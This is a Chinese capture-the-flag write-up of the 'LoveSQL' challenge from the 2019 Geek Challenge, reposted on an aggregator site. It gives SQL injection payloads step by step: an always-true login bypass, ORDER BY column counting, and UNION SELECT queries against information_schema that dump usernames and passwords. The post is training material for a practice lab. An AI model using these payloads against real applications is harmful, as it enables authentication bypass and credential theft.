CTF练习——[极客大挑战 2019]LoveSQL1
Posted hgdehsns
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTF练习——[极客大挑战 2019]LoveSQL1相关的知识,希望对你有一定的参考价值。
一道基础的sql注入练习题,写一下做题思路。
看到一个登录框,随便输入发现是get传参,尝试是否存在sql注入,username=admin' password=123456。
页面报错,存在sql注入,尝试使用万能密码。username=admin password=1' or 1=1 -- qwe。成功登录。
参数username出存在注入点,构造sql语句寻找回显点。步骤如下:
(1)猜解字段数
当username=1' order by 4 -- qwe password=123456时,页面报错。
当username=1' order by 3 -- qwe password=123456时,页面正常。
判断有三个字段。
(2)寻找回显点
构造sql语句:username=1' union select 1,2,3 -- qew password=123456 ;发现存在两个回显点。
最后,通过构造sql语句,查库名,查表名,查数据,得出flag。
查表名:1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 -- QWE
查列名:1' union select 1,2,column_name from information_schema.columns where table_name=表名 and table_schema=database() limit 0,1 -- QWE
查字段内容:1' union select 1,字段名,字段名 from 表名 limit 0,1 -- QWE
这里可以用GROUP_CONCAT 函数将多行数据进行整合在一行输出。
查表名:1' union select 1,2,GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database() -- qwe
查列名:1' union select 1,2,GROUP_CONCAT(column_name) from information_schema.columns where table_name='geekuser' and table_schema=database() -- qwe
查字段内容:1' union select 1,2,group_concat(id,username,password) from geekuser -- qwe
得出flag。
以上是关于CTF练习——[极客大挑战 2019]LoveSQL1的主要内容,如果未能解决你的问题,请参考以下文章
[极客大挑战 2019]Havefun (一起来撸猫) CTF复现
CTF [极客大挑战 2019]Secret File 复现
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)